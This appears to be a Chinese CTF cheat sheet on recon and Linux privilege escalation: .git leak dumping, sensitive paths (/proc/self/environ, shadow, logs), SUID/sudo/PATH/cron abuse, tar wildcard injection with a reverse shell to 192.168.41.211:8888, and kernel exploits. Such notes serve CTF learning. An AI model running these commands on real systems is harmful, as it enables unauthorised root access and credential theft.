信息收集 dirsearch GIT泄露 1 2 3 4 python2 GitHack.py http://dbf62640-ffa7-4303-adf4-e266a102c493.node5.buuoj.cn:81/.git/ cd /home/kali/Desktop/GitHack/dist/dbf62640-ffa7-4303-adf4-e266a102c493.node5.buuoj.cn_81git stash list git stash show -p
CVE POC批量查询工具 CVE POC 查询工具
侧信道攻击 侧信道攻击 是一种非直接攻击 方式,不是破解密码算法本身,而是通过分析系统实现中的物理特性 来获取敏感信息。攻击者“偷听”系统运行时的副作用信息 ,而不是直接攻击算法逻辑。一般来说,侧信道攻击利用了 时间差异(Timing Attack) 。
【Web】corCTF 2025 wp_2025 reverse wp-CSDN博客
本题利用的就是每次比较一个字符都会进行一次大数据计算一次(预估消耗时间差距很明显),给侧信道攻击提供了机会。
常见的敏感信息位置 linux 计划任务 系统级 1 2 3 4 5 6 7 8 9 10 /etc/cron.d * * * * * root echo "qwq" > /tmp/`cat /flag | base64 ` /etc/cron.hourly
用户级 1 2 3 4 /var/spool/cron/crontabs/root(用户名为名字命名文件) * * * * * echo "qwq" > /tmp/`cat /flag | base64 `
Nginx 1 2 3 4 5 6 日志: /var/log/nginx/access.log 配置: /etc/nginx/nginx.conf /usr/local/nginx/conf/nginx.conf
Apache 1 2 3 4 5 6 7 8 9 10 11 日志: /var/log/apache/access.log /var/log/apache2/access.log /var/www/logs/access.log /var/log/access.log /etc/httpd/logs/access_log /var/log/httpd/access_log 配置: /etc/apache2/apache2.conf /etc/httpd/conf/httpd.conf
Docker 1 2 启动命令文件: /docker-entrypoint.sh
1 2 3 4 5 6 /proc/self/cmdline history cat ~/.bashrccat ~/.bash_logoutcat .bash_history/root/.bash_history
获取交互式shell
1 /usr/bin/script -qc /bin/bash /dev/null
环境变量目录 1 2 /proc/self/environ /proc/1/environ
用户信息目录 设备信息目录 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 /proc/self/maps /proc/self/cwd /proc/[PID]/fd/[NUM] /proc/self/fd/[NUM] /dev/fd/[NUM] ls -la /proc/self/exe/lib/x86_64-linux-gnu/libc-2.31.so /usr/local/lib/php/pearcmd.php /usr/local/lib/php/peclcmd.php /usr/share/php/pearcmd.php /usr/share/php/peclcmd.php /sys/class/net/eth0/address /sys/class/net/ens33/address /sys/class/net/wlan0/address
linux 提权 提权百宝箱:GTFOBins
本地项目:【详细】本地运行 GTFOBins 教程-CSDN博客
suid 提权 具有 suid 的 二进制文件,会暂时拥有 root 权限。
赋予/取消 suid 权限
1 2 3 chmod u+s filenamechmod u-s filename
查询 suid 权限(都用下试一下)
1 2 3 find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls {} \; 2>/dev/null
find提权 /usr/bin/find
1 2 3 touch anyfile find anyfile -exec whoami \; find . -exec /bin/sh -p \; -quit
bash提权 /usr/bin/bash
1 2 bash -p bash -p -c "whoami"
vim提权 /usr/bin/vim
1 2 3 4 5 6 7 vim /etc/passwd vim /etc/shadow vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")' :set shell=/bin/sh :shell
vi提权 /usr/bin/vi
python提权 /usr/bin/python
1 python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
date提权 1 date -f /hereisflag/flllll111aaagg
time提权 1 2 time whoami time cat /etc/shadow
file提权 pkexec 提权 arthepsy/CVE-2021-4034:PwnKit 的 PoC:Polkit pkexec 中的本地权限升级漏洞(CVE-2021-4034) — arthepsy/CVE-2021-4034: PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034)
覆写高权限文件提权 2024 NepCTF 部分题目复现学习 | 心流
查看当前运行进程:
发现:
1 root 24 0.0 0.0 12024 2464 ? Ss 05:470:00 /usr/sbin/xinetd -pidfile /run/xinetd.pid -stayalive -inetd_compat -inetd_ipv6
root 执行了 xinetd,看一下配置文件:
1 cat /etc/xinetd.d/pwnservice
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 service pwnservice { disable = no socket_type = stream protocol = tcp wait = no user = root server = /bin/bash server_args = -c "/home/ctfuser/start.sh" port = 8888 bind = 0.0.0.0 type = UNLISTED per_source = 10 instances = 100 flags = REUSE }
也就是说这个会在接收到8888 端口的监听时 运行脚本,正好这个脚本我们是有权限修改的,就可以通过这里来执行。
1 2 3 echo "#!/bin/bash\nchmod 777 /home/ctf/user/f*" > /home/ctfuser/start.shnc 127.0.0.1 8888 ls -al
sudo提权 1 2 3 4 ascmd /bin/sh cat /etc/sudoerssudo -l
查看什么命令可以免密 sudo。
sudo + awk 提权 1 2 sudo -u user1 /bin/bashsudo awk 'BEGIN {system("/bin/sh")}'
sudo + apt 提权 1 sudo apt-get update -o APT::Update::Pre-Invoke::="/bin/bash -i"
环境变量提权 一般来说,调用 cat,都是 /usr/bin/cat,这里把环境变量 tmp 放在最前面,这里的 cat 就被劫持了自己定义的 /bin/bash,如果 调用 cat 的 sh 文件有 suid 权限的话,那么相应的 bash 也会有 su 权限。
1 2 3 4 5 6 7 echo "/bin/bash" > /tmp/catchmod 777 cat ls -al cat echo $PATH export PATH=/tmp:$PATH cd /home/shellwhoami
1 2 3 4 5 6 7 cd /tmpecho \"/bin/bash\">pschmod 777 psecho $PATH export PATH=/tmp:$PATH cd /./readflag
计划任务提权 重写提权 1 2 3 4 5 crontab -e 编辑计划任务 crontab -l 查看计划任务 crontab -r 删除目前的crontab cat /etc/crontab分 时 日 月 周 用户 命令
如果计划任务可以修改,可以重写计划任务本身 / 重写执行的 sh 提权。
通配符提权 tar 配合 -checkpoint-action 进行 RCE 云尘靶场-Linux提权系列 - Yuy0ung - 博客园
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 tar -czf 1.tgz 1.html --checkpoint=1 --checkpoint-action=exec =whoami echo " " > --checkpoint=1echo " " > --checkpoint-action=exec =whoami echo " " > /var/www/html/--checkpoint=1echo " " > /var/www/html/--checkpoint-action=exec ='bash shell.sh' echo "bash -i >&/dev/tcp/192.168.41.211/8888 0>&1" > /var/www/html/shell.shecho '/usr/bin/cp /usr/bin/find /tmp/myfind && chmod 4777 /tmp/myfind' > exploit.sh && echo '' > '--checkpoint=1' && echo '' > '--checkpoint-action=exec=sh exploit.sh' && chmod 777 /tmp/abcd/*
cp 配合软连接复制文件 2025 N1CTF Junior Web 方向全解 | J1rrY’s Blog
1 2 3 4 echo "" >"-H" ln -s /flag bkcp -P -H(优先级高于 —P) backup/bk
明文密码破解 1 2 3 4 5 6 john shadow.txt john --wordlist=dictionary_of_pwd.txt shadow.txt john --format=crypt shadow.txt john --show shadow.txt
linux内核提权 GitHub - SecWiki/linux-kernel-exploits: linux-kernel-exploits Linux平台提权漏洞集合
1 2 3 4 uname -asearchsploit linux 5.10.10 gcc 50808.c -o 50808 ./50808 /usr/bin/su
根据 cve 编号,搜索用法。
